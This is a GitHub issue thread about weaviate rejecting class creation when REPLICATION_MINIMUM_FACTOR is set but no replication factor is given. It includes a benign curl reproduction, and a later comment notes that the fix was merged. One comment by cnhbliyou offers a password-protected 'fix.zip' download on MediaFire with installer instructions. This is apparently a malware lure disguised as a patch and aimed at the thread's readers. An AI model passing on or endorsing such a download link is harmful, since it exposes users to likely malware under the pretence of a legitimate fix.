### ISSUE TITLE
Default replicas if not set to REPLICATION_MINIMUM_FACTOR 

### ISSUE THREAD

**Issue by trengrj** [weaviate/weaviate#5667]
Creating a class with `REPLICATION_MINIMUM_FACTOR` set and with no explicit replication factor provided will fail:

```sh
curl -X POST -H "Content-Type: application/json" -d '{"class": "Article"}' http://localhost:8080/v1/schema
{"error":[{"message":"invalid replication factor: setup requires a minimum replication factor of 3: got 1"}]}
```

Previously (before https://github.com/weaviate/weaviate/commit/7eaef5389378c999da267bdc992b8ac3f68fc131 / 1.25) this worked as `replica.ValidateConfig` has a nil check for `ReplicationConfig` setting it otherwise to `MinimumFactor`. However we now set the default `ReplicationConfig.Factor` to 1.

https://github.com/weaviate/weaviate/blob/aba0017951205e2b078d364299d1a9e61776e84a/usecases/schema/class.go#L277-L279

We should default replicas if not set to `REPLICATION_MINIMUM_FACTOR` so users in HA environment can create classes easily.

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by moogacs** [comment]
https://github.com/weaviate/weaviate/pull/5669 was merged
